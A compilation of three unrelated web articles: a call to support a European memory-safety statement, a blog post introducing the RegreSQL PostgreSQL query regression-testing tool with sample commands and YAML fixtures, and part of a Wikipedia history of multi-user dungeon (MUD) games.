With the upcoming Cyber Resilience Act in the EU mandating a secure-by-design development process, we urge organisations and individuals to support our statement "Improving Europe's cybersecurity posture through memory safety".

The statement is a joint effort by secure-by-design experts at leading organizations, including Siemens Mobility, Sovereign Tech Agency, OpenSSF, Google, the Linux Foundation, the Rust Foundation, and national cybersecurity committees.

See the How to show support section to add your name to the call.

Executive summary:

“The number of cybersecurity incidents that affect European citizens and businesses is rising at an alarming rate. 70% of the vulnerabilities in major digital systems built on decades-old technologies share the same root cause and can be prevented by using modern, memory-safe technology.

This technology is mature, perfectly fits Europe’s forthcoming secure-by-design approach to cybersecurity, and is the most effective way to protect Europe’s cybersecurity, to reduce cybersecurity costs, and to foster innovation.

However, its adoption rate is slow due to a lack of short-term economic incentives. We’ve now left the door wide open: attackers eagerly exploit vulnerabilities in our major digital systems.

The supporting organisations call on European and national policymakers to act, out of obligation as well as untapped opportunity: to provide clear incentives and support for the large-scale adoption of memory-safe technology.”

The full statement can be read here.

The time is now

Having established a lack of awareness among EU and national policymakers, Tara Tarakiyee and I, Hugo van de Pol, initiated and led joint discussions with security experts and industry stakeholders, and authored the statement as a result.

This lack of awareness contrasts sharply with the proactive involvement of the Cybersecurity and Infrastructure Security Agency (CISA), among others, in the USA from 2023 onwards. With the CRA on its way, and the examples of CISA et al. at our disposal, now is the time for the EU to act.

How to show support

If you agree with our position that memory safety should be on the EU and national cybersecurity agendas, please consider adding your name to this statement to show your support. You can support the statement as an organisation or as an individual.

Having your name on the statement does not come with any further commitments; it is simply to indicate your agreement with the statement.

Indicating your support is easy: send an email to Hugo van de Pol in which you state the name of the supporting organisation, or your name and affiliation.

If you know someone who might do the same, please feel free to send them this web page and/or the PDF of the statement.


List of supporters

Supporting organizations:

... more tba


Contributors

Contributions to this statement were made by:

  • Josh Aas, Internet Security Research Group
  • Rebecca Rumbul, Rust Foundation
  • Thomas Rooijakkers, TNO
  • Jeffrey Vander Stoep, Google
  • Benjamin Schilling
  • Christian (fukami) Horchert, CrabNebula Ltd.
  • prof. dr. H.J. Bos, Vrije Universiteit Amsterdam
  • Erik Poll, Radboud University
  • Harry van Haaren, Openchip
  • Marius Gläß, Bundesamt für Sicherheit in der Informationstechnik

Tara Tarakiyee is a Technologist at Sovereign Tech Agency, who works on designing, supporting and mobilizing resources to encourage, sustain and maintain our open digital infrastructure.

Hugo van de Pol is Director at Tweede golf and Board member at Trifecta Tech Foundation, who has been advocating the use of memory-safe technologies like Rust for years.



RegreSQL: Regression Testing for PostgreSQL Queries

Hacker News
boringsql.com
2025-11-14 07:10:10
Comments...
Original Article

TL;DR - RegreSQL brings PostgreSQL's regression testing methodology to your application queries, catching both correctness bugs and performance regressions before production.

As puzzling as it might seem, the common problem with production changes is the ever-present "AHA" moment when things start slowing down or crashing straight away. Testing isn't easy as it is, but there's a widespread practice gap when it comes to testing SQL queries. Some might pretend to "fix it" by using ORMs to abstract away the problem. Others treat SQL as "just glue code" that doesn't deserve systematic testing. Most settle for integration tests that verify the application layer works, never actually testing whether their queries will survive the next schema change or index modification.

For PostgreSQL development itself, the project has a robust regression test suite that has been preventing disasters in core development for decades. The database itself knows how to test SQL systematically - we just don't use those same techniques for our own queries. Enter RegreSQL , a tool originally created by Dimitri Fontaine for The Art of PostgreSQL book (which is excellent for understanding and mastering PostgreSQL as a database system), designed to bring the same regression testing framework to our application queries.

I've been trying to use it for some time, but due to missing features and limitations I gave up several times. Until now. I decided to fork the project and spend the time needed to take it to the next level.

Introduction

The RegreSQL promise starts with the biggest strength and perceived weakness of SQL queries: they are just strings. And unless you use something like sqlc (for Go), PG'OCaml or Rust's SQLx toolkit to get compile-time checking, your queries are validated only when they are executed. In the better case that means a usually slow-ish test suite or integration tests; in the worst case, they are validated only when deployed. ORMs are another possibility - completely abstracting away SQL (but more on that later).

But even with compile-time checking, you are only checking for one class of problems: schema mismatches. What about behavior changes after schema migration or performance regressions? What about understanding whether your optimization actually made things faster or just moved the problem elsewhere?

This is where RegreSQL comes in. Rather than trying to turn SQL into something else, RegreSQL embraces the "SQL as strings" reality and applies the same testing methodology PostgreSQL itself uses: regression testing. You write (or generate - continue reading) your SQL queries, provide input data, and RegreSQL verifies that future changes don't break the expected results.

The features don't stop there though - it tracks performance baselines, detects common query plan regressions (like sequential scans), and gives you a framework for systematic experimentation with schema changes and query change management.

Enough with the theory. Let's jump straight into the action and see what a sample run of RegreSQL looks like:

$ regresql test
Connecting to 'postgres://radim:password123@192.168.139.28/cdstore_test'… ✓

Running regression tests...

✓ album-by-artist_list-albums-by-artist.1.json (0.00s)
✓ album-by-artist_list-albums-by-artist.2.json (0.00s)

✓ album-tracks_list-tracks-by-albumid.2.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.1.json (0.00s)

✓ artist_top-artists-by-album.1.json (0.00s)

✓ genre-topn_genre-top-n.top-1.json (0.00s)
✓ genre-topn_genre-top-n.top-3.json (0.00s)

✓ genre-tracks_tracks-by-genre.json (0.00s)

Results: 8 passed, 0 failed, 8 skipped (0.00s)

In this example, based on the Chinook database (as used originally in The Art of PostgreSQL book), RegreSQL scans the current directory (or the one provided by -C /path/to/project) for *.sql files and attempts to run all queries against the configured PostgreSQL connection.

Individual files can contain either a single SQL query or multiple queries, like the following example:

-- name: top-artists-by-album
-- Get the list of the N artists with the most albums
SELECT
    artist.name,
    count(*) AS albums
FROM
    artist
    LEFT JOIN album USING (artist_id)
GROUP BY
    artist.name
ORDER BY
    albums DESC
LIMIT :n;

The query syntax supports both positional arguments (like $1, known from the libpq library) and the (preferred) psql-style variables (:varname). Each identified query (not file) is then executed 0..N times, based on the number of predefined plans, and verified against the expected results - validating that the data returned matches what was expected. Support for handling SQL files is available separately at https://github.com/boringSQL/queries (Go version only for now).
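
For comparison, here is a minimal sketch of the same query using the libpq-style positional form instead; the query name is made up for this example, and the :n variant above remains the preferred style.

-- name: top-artists-by-album-positional
-- Same query as above, with a positional parameter instead of :n
SELECT
    artist.name,
    count(*) AS albums
FROM
    artist
    LEFT JOIN album USING (artist_id)
GROUP BY
    artist.name
ORDER BY
    albums DESC
LIMIT $1;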

This gives you what the original RegreSQL tool introduced - change your schema, refactor a query, run regresql test, and see immediately what broke. The test suite now has the ability to catch regressions before they are committed or shipped. The current version builds on top of that, giving you a better console formatter instead of TAP-style output, as well as JUnit, JSON and GitHub Actions formatters for better integration into your CI/CD pipelines.

Performance regression testing

Basic regression testing catches correctness issues - wrong results, broken queries, schema mismatches. But there's another class of production issues it misses: performance regressions. No matter how unbelievable it might sound, queries get deployed without appropriate indexes, or they change over time. A simple fix - to handwritten SQL and ORM code alike - can take a query from milliseconds to seconds. You add an index that helps one query but tanks another. You modify a condition and accidentally force a sequential scan over millions of rows. This is where it hurts.
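
As a purely illustrative sketch (the customers table and its plain B-tree index on email are assumptions for this example, not part of the Chinook schema), here is how a one-line "fix" can silently trade an index lookup for a sequential scan:

-- Served by a plain B-tree index on customers (email)
SELECT id, name FROM customers WHERE email = :email;

-- The "small fix" for case-insensitive matching: the plain index no longer
-- applies, and PostgreSQL falls back to a sequential scan
SELECT id, name FROM customers WHERE lower(email) = lower(:email);

-- ...unless a matching expression index is added
CREATE INDEX customers_lower_email_idx ON customers (lower(email));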

RegreSQL addresses this by tracking performance baselines alongside correctness. Once baselines are generated

$ regresql baseline
Connecting to 'postgres://appuser:password123@192.168.139.28/cdstore_test'… ✓
Creating baselines directory: regresql/baselines
Creating directory 'regresql/baselines'

Creating baselines for queries:

  ./
  Created baseline: album-by-artist_list-albums-by-artist.1.json
  Created baseline: album-by-artist_list-albums-by-artist.2.json
  Created baseline: album-tracks_list-tracks-by-albumid.1.json
  Created baseline: album-tracks_list-tracks-by-albumid.2.json
  Created baseline: artist_top-artists-by-album.1.json
  Created baseline: genre-topn_genre-top-n.top-1.json
  Created baseline: genre-topn_genre-top-n.top-3.json
  Created baseline: genre-tracks_tracks-by-genre.json

Baselines have been created successfully!
Baseline files are stored in: regresql/baselines

the test command not only checks for regressions against the captured baselines, but also detects common bad patterns in query execution plans. For now it warns about sequential scans - on their own and/or inside nested loops - and about multiple sort operations. I believe this alone can provide valuable insights and reduce mishaps in production. It's also the area where further development of RegreSQL will take place.

To demonstrate this, let's review the test output with the baselines.

Connecting to 'postgres://appuser:password123@192.168.139.28/cdstore_test'… ✓

Running regression tests...

✓ album-by-artist_list-albums-by-artist.1.json (0.00s)
✓ album-by-artist_list-albums-by-artist.2.json (0.00s)
✓ album-by-artist_list-albums-by-artist.1.cost (22.09 <= 22.09 * 110%) (0.00s)
  ⚠️  Sequential scan detected on table 'artist'
    Suggestion: Consider adding an index if this table is large or this query is frequently executed
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans
✓ album-by-artist_list-albums-by-artist.2.cost (22.09 <= 22.09 * 110%) (0.00s)
  ⚠️  Sequential scan detected on table 'artist'
    Suggestion: Consider adding an index if this table is large or this query is frequently executed
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans

✓ album-tracks_list-tracks-by-albumid.1.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.2.json (0.00s)
✓ album-tracks_list-tracks-by-albumid.1.cost (8.23 <= 8.23 * 110%) (0.00s)
✓ album-tracks_list-tracks-by-albumid.2.cost (8.23 <= 8.23 * 110%) (0.00s)

✓ artist_top-artists-by-album.1.json (0.00s)
✓ artist_top-artists-by-album.1.cost (35.70 <= 35.70 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: album, artist
    Suggestion: Review query and consider adding indexes on filtered/joined columns

✓ genre-topn_genre-top-n.top-1.json (0.00s)
✓ genre-topn_genre-top-n.top-3.json (0.00s)
✓ genre-topn_genre-top-n.top-1.cost (6610.59 <= 6610.59 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: genre, artist
    Suggestion: Review query and consider adding indexes on filtered/joined columns
  ⚠️  Multiple sort operations detected (2 sorts)
    Suggestion: Consider composite indexes for ORDER BY clauses to avoid sorting
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans
✓ genre-topn_genre-top-n.top-3.cost (6610.59 <= 6610.59 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: artist, genre
    Suggestion: Review query and consider adding indexes on filtered/joined columns
  ⚠️  Multiple sort operations detected (2 sorts)
    Suggestion: Consider composite indexes for ORDER BY clauses to avoid sorting
  ⚠️  Nested loop join with sequential scan detected
    Suggestion: Add index on join column to avoid repeated sequential scans

✓ genre-tracks_tracks-by-genre.json (0.00s)
✓ genre-tracks_tracks-by-genre.cost (37.99 <= 37.99 * 110%) (0.00s)
  ⚠️  Multiple sequential scans detected on tables: genre, track
    Suggestion: Review query and consider adding indexes on filtered/joined columns

Results: 16 passed (0.00s)

As you can see, even where costs stay within the baseline threshold, RegreSQL is able to flag basic bad patterns that should be addressed before queries can be considered "production ready".

In some cases, sequential scan detection, or query cost baseline tracking in general, might be undesirable and lead to false positives. RegreSQL lets you address this through query metadata, as demonstrated below.

-- name: query_name
-- metadata: key1=value1, key2=value2
SELECT ...;

At this point RegreSQL recognizes

  • notest to skip the query testing altogether (not just cost tracking)
  • nobaseline to skip cost tracking
  • noseqscanwarn to keep cost tracking but disable sequential scan warnings
  • and difffloattolerance to adjust the cost failure threshold (default 10% at the moment).
-- name: query_name
-- regresql: notest, nobaseline
-- regresql: noseqscanwarn
-- regresql: difffloattolerance:0.25
-- query that can vary in cost by 25% without being considered a failure
SELECT ...;

ORM enters the room

ORMs abstract away SQL, but they still generate it - and that generated SQL can have performance problems you won't catch until production. Consider this common scenario: you start with a simple SQLAlchemy query that works fine, then months later add eager loading for related data:

orders = (
    session.query(Order)
    .filter(Order.user_id == user_id)
    .options(
        joinedload(Order.user),
        joinedload(Order.shipping_address),
        selectinload(Order.items)  # NEW: Load order items
    )
    .all()
)

That innocent selectinload(Order.items) generates a separate query - and without an index on order_items.order_id, it performs a sequential scan.
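
The emitted statement is roughly of the following shape (simplified; the exact SQL varies by SQLAlchemy version, and the column names here are assumptions), together with the index that would address RegreSQL's sequential scan warning:

-- name: load-order-items
-- Approximation of what selectinload(Order.items) emits for a batch of orders
SELECT order_items.id, order_items.order_id, order_items.product_id, order_items.quantity
FROM order_items
WHERE order_items.order_id IN (:order_id_1, :order_id_2, :order_id_3);

-- The missing index that would let the query above avoid the sequential scan
CREATE INDEX order_items_order_id_idx ON order_items (order_id);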

RegreSQL can catch this by intercepting ORM-generated SQL using SQLAlchemy's event system:

from sqlalchemy import event  # 'engine' is your application's SQLAlchemy engine
captured_queries = []  # collects every statement the ORM emits

@event.listens_for(engine, "before_cursor_execute")
def capture_sql(conn, cursor, statement, *args):
    captured_queries.append(statement)

Run your ORM code, capture the SQL, save it as a .sql file, and test it with RegreSQL. The performance baseline testing will flag the missing index before it hits production. This is currently experimental, but ORM integration is a key area for RegreSQL's future development.

Test Data Management

Up until now we have covered how RegreSQL verifies query correctness and tracks performance regressions. But there's a critical prerequisite we've only skimmed over: every regression test needs consistent, reproducible data. Change the data or its cardinality, and your expected results become meaningless. Your performance baselines drift. Your tests become flaky.

Traditional approaches to creating test data might involve:

  • Database dumps become unmanageable - 500MB files you can't review, can't understand, that break with every schema migration, and whose data becomes stale as production evolves. Which version of the dump are your tests even using?
  • SQL scripts might be better than dumps, but still imperative and hard to maintain. You end up with INSERT statements scattered across multiple files, managing foreign keys manually, and debugging constraint violations.
  • Factories in application code might work great for integration tests, but we're testing SQL directly. Do you really want to maintain parallel data generation in your application language just for SQL tests?
  • A shared test database is a synonym for the classic "works on my machine" problem. State leaks between tests. Parallel execution becomes impossible. Debugging is a nightmare.

What we need is something that's declarative (what data, not how to insert it), reproducible (similar data every time), composable (build complex scenarios from simple pieces), and scalable (from 10 rows to 100,000).

This is where the next improvement, RegreSQL's fixture system, comes in. Think of it as infrastructure-as-code for your test data. You describe the data you need in YAML files, and RegreSQL handles the rest - dependencies, cleanup, foreign keys, and even realistic data generation at scale.

RegreSQL's fixture system lets you define test data in YAML files stored in regresql/fixtures/. Here's a simple example:

  fixture: basic_users
  description: a handful of test users
  cleanup: rollback

  data:
    - table: users
      rows:
        - id: 1
          email: alice@example.com
          name: Alice Anderson
          created_at: 2024-01-15
        - id: 2
          email: bob@example.com
          name: Bob Builder
          created_at: 2024-02-20

To use this fixture in your tests, just reference it in the query's plan file (regresql/plans/get-user.yaml):

  fixtures:
    - basic_users

  "1":
    email: alice@example.com

  "2":
    email: bob@example.com

And when you run regresql test, the fixture is automatically loaded before the query executes and cleaned up afterward. No manual setup scripts, no state leakage between tests. But it does not stop with static fixtures. When you want to test queries against realistic volumes, you can use a range of data generators, including:

  • sequences, random integer, decimal, string, uuid, email and name generators
  • date_between for generating random timestamps within a range
  • foreign key references to be able to reuse data from other table's fixtures
  • range to select a value from predefined sources
  • Go template support

  fixture: realistic_orders
  generate:
    - table: customers
      count: 1000
      columns:
        id:
          generator: sequence
          start: 1
        email:
          generator: email
          domain: shop.example.com
        name:
          generator: name
          type: full
        created_at:
          generator: date_between
          start: "2023-01-01"
          end: "2024-12-31"

    - table: orders
      count: 5000
      columns:
        id:
          generator: sequence
          start: 1
        customer_id:
          generator: int
          min: 1
          max: 1000
        amount:
          generator: decimal
          min: 10.00
          max: 999.99
          precision: 2
        order_date:
          generator: date_between
          start: "2023-01-01"
          end: "2024-12-31"

This generates 1,000 customers and 5,000 orders with realistic-looking data - names, emails, dates, and amounts that feel production-like.

Fixtures are also stackable and can be built on top of each other. For example, if you need to make sure the users fixtures are created before the orders fixtures, just declare the dependency (a planned improvement is automatic foreign-key detection to avoid hard-coding IDs). RegreSQL loads fixtures in dependency order and handles cleanup in reverse.

  fixture: orders_with_shipping
  depends_on:
    - basic_users

  data:
    - table: orders
      rows:
        - id: 101
          user_id: 1  # References Alice from basic_users
          total: 99.99
          status: shipped

Should the available fixture options (manual data or data generators) not be enough, you always have the option of good old SQL-based data generation.

  fixture: mixed_setup
  description: Combine SQL with YAML and generated data
  cleanup: rollback

  # SQL executes first (either as file or inline)
  sql:
    - file: sql/setup_schema.sql
    - inline: "INSERT INTO config (key, value) VALUES ('version', '1.0');"

  # followed YAML data
  data:
    - table: users
      rows:
        - id: 1
          email: admin@example.com

  # and finally generated data
  generate:
    - table: orders
      count: 100
      columns:
        id:
          generator: sequence
          start: 1
        user_id:
          generator: int
          min: 1
          max: 1

RegreSQL provides commands to inspect and validate your fixtures

  # List all available fixtures
  regresql fixtures list

  # Show fixture details and dependencies
  regresql fixtures show realistic_orders

  # Validate fixture definitions
  regresql fixtures validate

  # Show dependency graph
  regresql fixtures deps

  # Apply fixture manually (for debugging)
  regresql fixtures apply basic_users

The fixture system has been designed to transform test data from a maintenance burden into a documented, version-controlled process. Your YAML files become the single source of truth for the data your tests need, making it easy to understand test scenarios and maintain test data as the application evolves.

RegreSQL future

Introducing a new open source project is an ambitious goal, and RegreSQL is just starting out, despite the fork being in the works for almost two years. In the coming weeks and months I plan further improvements, as well as better documentation and more tutorials. The project is maintained as part of my boringSQL brand, where it's a vital component for building SQL Labs, which (as I sincerely hope) will provide a foundation for its further development.

At the same time, RegreSQL is an attempt to give back to the welcoming PostgreSQL community, to make the developer experience slightly better where possible, and (just maybe) to provide one more argument against the claim that SQL queries are not testable.

RegreSQL is available on GitHub - feel free to open an issue, drop me an email about the project at radim@boringsql.com, or connect on LinkedIn.

Multi-User Dungeon (MUD)

Hacker News
en.wikipedia.org
2025-11-14 06:57:22
Comments...
Original Article

This article is about a type of online computer game. For the first game called "MUD" or "Multi-User Dungeon", see MUD1 .

"MCCP" redirects here. For the class of chemical compounds, see Chlorinated paraffins .

A screenshot of a MUD

A multi-user dungeon (MUD), also known as a multi-user dimension or multi-user domain, [ 1 ] [ 2 ] is a multiplayer real-time virtual world, usually text-based or storyboarded. MUDs combine elements of role-playing games, hack and slash, player versus player, interactive fiction, and online chat. Players can read or view descriptions of rooms, objects, other players, and non-player characters, and perform actions in the virtual world that are typically also described. Players typically interact with each other and the world by typing commands that resemble a natural language, as well as using a character typically called an avatar. [ 3 ]

Traditional MUDs implement a role-playing video game set in a fantasy world populated by fictional races and monsters , with players choosing classes in order to gain specific skills or powers. The objective of this sort of game is to slay monsters , explore a fantasy world, complete quests, go on adventures, create a story by roleplaying , and advance the created character. Many MUDs were fashioned around the dice-rolling rules of the Dungeons & Dragons series of games.

Such fantasy settings for MUDs are common, while many others have science fiction settings or are based on popular books, movies, animations, periods of history, worlds populated by anthropomorphic animals, and so on. Not all MUDs are games; some are designed for educational purposes, while others are purely chat environments , and the flexible nature of many MUD servers leads to their occasional use in areas ranging from computer science research to geoinformatics to medical informatics to analytical chemistry . [ 4 ] [ 5 ] [ 6 ] [ 7 ] MUDs have attracted the interest of academic scholars from many fields, including communications , sociology , law , and economics . [ 8 ] [ 9 ] [ 10 ] At one time, there was interest from the United States military in using them for teleconferencing. [ 11 ]

Most MUDs are run as hobbies and are free to play; some may accept donations or allow players to purchase virtual items , while others charge a monthly subscription fee. MUDs can be accessed via standard telnet clients, or specialized MUD clients, which are designed to improve the user experience. Numerous games are listed at various web portals, such as The Mud Connector .

The history of modern massively multiplayer online role-playing games (MMORPGs) like EverQuest and Ultima Online , and related virtual world genres such as the social virtual worlds exemplified by Second Life , can be traced directly back to the MUD genre. [ 10 ] [ 12 ] Indeed, before the invention of the term MMORPG, games of this style were simply called graphical MUDs . A number of influential MMORPG designers began as MUD developers and/or players [ 13 ] (such as Raph Koster , Brad McQuaid , [ 14 ] Matt Firor, and Brian Green [ 15 ] ) or were involved with early MUDs (like Mark Jacobs and J. Todd Coleman ).

Will Crowther's Adventure

Colossal Cave Adventure , created in 1975 by Will Crowther on a DEC PDP-10 computer, was the first widely played adventure game . The game was significantly expanded in 1976 by Don Woods . Also called Adventure , it contained many D&D features and references, including a computer controlled dungeon master . [ 16 ] [ 17 ]

Numerous dungeon crawlers were created on the PLATO system at the University of Illinois and other American universities that used PLATO, beginning in 1975. Among them were " pedit5 ", "oubliette", " moria ", "avatar", "krozair", "dungeon", " dnd ", "crypt", and "drygulch". By 1978–79, these games were heavily in use on various PLATO systems, and exhibited a marked increase in sophistication in terms of 3D graphics, storytelling, user involvement, team play, and depth of objects and monsters in the dungeons. [ 18 ]

Inspired by Adventure , a group of students at MIT in the summer of 1977 wrote a game for the PDP-10 minicomputer; called Zork , it became quite popular on the ARPANET . Zork was ported , under the filename DUNGEN ("dungeon"), to FORTRAN by a programmer working at DEC in 1978. [ 19 ] [ 1 ]

In 1978 Roy Trubshaw , a student at the University of Essex in the UK, started working on a multi-user adventure game in the MACRO-10 assembly language for a DEC PDP-10. He named the game MUD ( Multi-User Dungeon ), in tribute to the Dungeon variant of Zork , which Trubshaw had greatly enjoyed playing. [ 20 ] Trubshaw converted MUD to BCPL (the predecessor of C ), before handing over development to Richard Bartle , a fellow student at the University of Essex, in 1980. [ 21 ] [ 22 ] [ 23 ] The game revolved around gaining points till one achieved the Wizard rank, giving the character immortality and special powers over mortals.

Wider access and early derivatives

MUD , better known as Essex MUD and MUD1 in later years, ran on the University of Essex network, and became more widely accessible when a guest account was set up that allowed users on JANET (a British academic X.25 computer network) to connect on weekends and between the hours of 2 AM and 8 AM on weekdays. [ 24 ] It became the first Internet multiplayer online role-playing game in 1980 and started the online gaming industry as a whole [ 25 ] when the university connected its internal network to ARPANET . [ 26 ]

The original MUD game was closed down in late 1987, [ 27 ] reportedly under pressure from CompuServe , to whom Richard Bartle had licensed the game. This left MIST , a derivative of MUD1 with similar gameplay, as the only remaining MUD running on the University of Essex network, becoming one of the first of its kind to attain broad popularity. MIST ran until the machine that hosted it, a PDP-10 , was superseded in early 1991. [ 28 ]

1985 saw the origin of a number of projects inspired by the original MUD . These included Gods by Ben Laurie , a MUD1 clone that included online creation in its endgame, and which became a commercial MUD in 1988; [ 29 ] and MirrorWorld , [ 30 ] a tolkienesque MUD started by Pip Cordrey who gathered some people on a BBS he ran to create a MUD1 clone that would run on a home computer.

Neil Newell, an avid MUD1 player, started programming his own MUD called SHADES during Christmas 1985, because MUD1 was closed down during the holidays. Starting out as a hobby, SHADES became accessible in the UK as a commercial MUD via British Telecom's Prestel and Micronet networks. [ 31 ] A scandal on SHADES led to the closure of Micronet , as described in Indra Sinha 's net-memoir, The Cybergypsies . [ 32 ]

At the same time, Compunet started a project named Multi-User Galaxy Game as a science fiction alternative to MUD1 , a copy of which they were running on their system at the time. When one of the two programmers left CompuNet, the remaining programmer, Alan Lenton, decided to rewrite the game from scratch and named it Federation II (at the time no Federation I existed). The MUD was officially launched in 1989. [ 33 ] Federation II was later picked up by AOL, where it became known simply as Federation: Adult Space Fantasy . Federation later left AOL to run on its own after AOL began offering unlimited service.

Other early MUD-like games

In 1978, around the same time Roy Trubshaw wrote MUD , Alan E. Klietz wrote a game called Scepter (Scepter of Goth), and later called Milieu using Multi- Pascal on a CDC Cyber 6600 series mainframe which was operated by the Minnesota Educational Computing Consortium . [ 34 ] Klietz ported Milieu to an IBM XT in 1983, naming the new port Scepter of Goth . Scepter supported 10 to 16 simultaneous users, typically connecting in by modem. It was the first commercial MUD; [ 35 ] franchises were sold to a number of locations. Scepter was first owned and run by GamBit (of Minneapolis, Minnesota ), founded by Bob Alberti. GamBit's assets were later sold to Interplay Productions . [ 36 ] [ 37 ]

In 1984, Mark Peterson wrote The Realm of Angmar , beginning as a clone of Scepter of Goth . In 1994, Peterson rewrote The Realm of Angmar , adapting it to MS-DOS (the basis for many dial-in BBS systems), and renamed it Swords of Chaos . For a few years this was a popular form of MUD, hosted on a number of BBS systems, until widespread Internet access eliminated most BBSes. [ citation needed ]

In 1984, Mark Jacobs created and deployed a commercial gaming site, Gamers World . The site featured two games coded and designed by Jacobs, a MUD called Aradath (which was later renamed, upgraded and ported to GEnie as Dragon's Gate ) and a 4X science-fiction game called Galaxy , which was also ported to GEnie . At its peak, the site had about 100 monthly subscribers to both Aradath and Galaxy . GEnie was shut down in the late 1990s, although Dragon's Gate was later brought to AOL before it was finally released on its own. Dragon's Gate was closed on February 10, 2007. [ 38 ]

In the summer of 1980, University of Virginia classmates John Taylor and Kelton Flinn wrote Dungeons of Kesmai , a six-player game inspired by Dungeons & Dragons that used roguelike ASCII graphics. They founded the Kesmai company in 1982, and in 1985 an enhanced version, Island of Kesmai , was launched on CompuServe . Later, its 2-D graphical descendant Legends of Kesmai was launched on AOL in 1996. The games were retired commercially in 2000. [ 39 ]

The popularity of MUDs of the University of Essex tradition escalated in the United States during the late 1980s when affordable personal computers with 300 to 2400 bit/s modems enabled role-players to log into multi-line BBSs and online service providers such as CompuServe . During this time it was sometimes said that MUD stands for "Multi Undergraduate Destroyer" due to their popularity among college students and the amount of time devoted to them. [ 40 ]

Avalon: The Legend Lives was published by Yehuda Simmons in 1989. It was the first persistent game world of its kind without the traditional hourly resets [ 41 ] and points-based puzzle-solving progression systems. [ 42 ] Avalon introduced equilibrium and balance (cooldowns), skill-based player-versus-player combat, and concepts such as player-run governments and player housing. [ 43 ]

In 2004, significant uses of MUDs included "online gaming, education,...socializing", as well as religious rituals and other religious activities. [ 3 ]

The first popular MUD codebase was AberMUD, written in 1987 by Alan Cox , named after the University of Wales, Aberystwyth . Alan Cox had played the original University of Essex MUD, and the gameplay was heavily influenced by it. [ 44 ] AberMUD was initially written in B for a Honeywell L66 mainframe under GCOS3/TSS. In late 1988 it was ported to C , which enabled it to spread rapidly to many Unix platforms upon its release in 1989. AberMUD's popularity resulted in several inspired works, the most notable of which were TinyMUD , LPMud , and DikuMUD . [ 45 ]

Monster was a multi-user adventure game created by Richard Skrenta for the VAX and written in VMS Pascal. It was publicly released in November 1988. [ 46 ] [ 47 ] Monster was disk-based and modifications to the game were immediate. Monster pioneered the approach of allowing players to build the game world , setting new puzzles or creating dungeons for other players to explore. [ 48 ] Monster, which comprised about 60,000 lines of code, had many features which appeared to be designed to allow Colossal Cave Adventure to work in it. Though there never were many network-accessible Monster servers, it inspired James Aspnes to create a stripped-down version of Monster which he called TinyMUD. [ 49 ]

TinyMUD, written in C and released in late 1989, spawned a number of descendants, including TinyMUCK and TinyMUSH . TinyMUCK version 2 contained a full programming language named MUF (Multi-User Forth), while MUSH greatly expanded the command interface. To distance TinyMUD from the combat-oriented traditional MUDs, it was said that its "D" stood for Multi-User "Domain" or "Dimension"; this, along with the eventual popularity of acronyms other than MUD (such as MUCK, MUSH, MUSE, and so on) for this kind of server, led to the eventual adoption of the term MU* to refer to the TinyMUD family. [ 1 ] [ 2 ] UberMUD, UnterMUD, and MOO were inspired by TinyMUD but are not direct descendants. [ 50 ]

TinyMUD is also used to refer to the first database run under the TinyMUD codebase, which is also known as TinyMUD Classic; [ 51 ] it ran from August 1989 to April 1990, and still comes back up every August during a holiday called Brigadoon Day, a reference to the Scottish village in the musical Brigadoon .

The first version of Hourglass was written by Yehuda Simmons, and later Daniel James, for Avalon: The Legend Lives , which debuted in 1989 at the last of the London MUD mega-meets, aptly named Adventure '89, [ 52 ] and was initially hosted on the IOWA system. Originally written in ARM assembly language on the Acorn Archimedes 440, Hourglass made the leap in 1994 from the venerable Archimedes to Debian Linux on the PC, and later to Red Hat, where (apart from a shift to Ubuntu) it has remained ever since. An early version of Hourglass was also ported to the PC, under the name Vortex, by Ben Maizels in 1992.

Although written specifically for Avalon: The Legend Lives , Hourglass went on to spawn a number of other games, including Avalon: The First Age , which ran from 1999 to 2014. The now-defunct Age of Thrones (1996) and, notably, Achaea, Dreams of Divine Lands also started life in Vortex, the latter before moving to its own Rapture engine. Hourglass was still being developed as of 2016, when Avalon: The Legend Lives contained 2,901,325 written words and 2,248,374 lines of game code (with 2,417,900 instructions); the original game came in at 1 KB in 1989, compared with 102 GB in January 2016.

In 1989, LPMud was developed by Lars Pensjö (hence the LP in LPMud). Pensjö had been an avid player of TinyMUD and AberMUD and wanted to create a world with the flexibility of TinyMUD and the gameplay of AberMUD. To accomplish this, he wrote what would nowadays be called a virtual machine , the LPMud driver, which ran the C-like LPC programming language used to create the game world. [ 53 ] Pensjö's interest in LPMud eventually waned, and development was carried on by others such as Jörn "Amylaar" Rennecke , Felix "Dworkin" Croes , Tim "Beek" Hollebeek and Lars Düning. During the early 1990s, LPMud was one of the most popular MUD codebases. [ 54 ] Descendants of the original LPMud include MudOS , DGD , SWLPC , FluffOS , and the Pike programming language, the latter the work of long-time LPMud developer Fredrik "Profezzorn" Hübinette.
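
As a rough, hedged illustration of that driver/content split (this is not LPC and not the real LPMud driver's API; every name below is invented), a toy version in Python might look like the sketch below: the "driver" only runs the loop and dispatches typed commands, while each world object registers its own verbs, loosely in the spirit of LPC objects registering actions.

    # Toy sketch of a driver/world-code split, loosely in the spirit of LPMud.
    # Nothing here is real LPC; it only illustrates the architectural idea.

    class WorldObject:
        """Base class for game content written separately from the driver."""
        def __init__(self):
            self.actions = {}              # verb -> handler

        def add_action(self, verb, handler):
            self.actions[verb] = handler

    class Swamp(WorldObject):
        def __init__(self):
            super().__init__()
            self.add_action("drop", self.drop_treasure)

        def drop_treasure(self, arg):
            return f"You drop the {arg} into the swamp and feel more powerful."

    class Driver:
        """The 'virtual machine': owns the loop, knows nothing about content."""
        def __init__(self, objects):
            self.objects = objects

        def dispatch(self, line):
            verb, _, arg = line.partition(" ")
            for obj in self.objects:
                if verb in obj.actions:
                    return obj.actions[verb](arg)
            return "Nothing happens."

    driver = Driver([Swamp()])
    print(driver.dispatch("drop crown"))   # -> You drop the crown into the swamp...
    print(driver.dispatch("sing"))         # -> Nothing happens.

The design point is the separation itself: the driver can stay running while new world objects are written, loaded, and modified independently.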

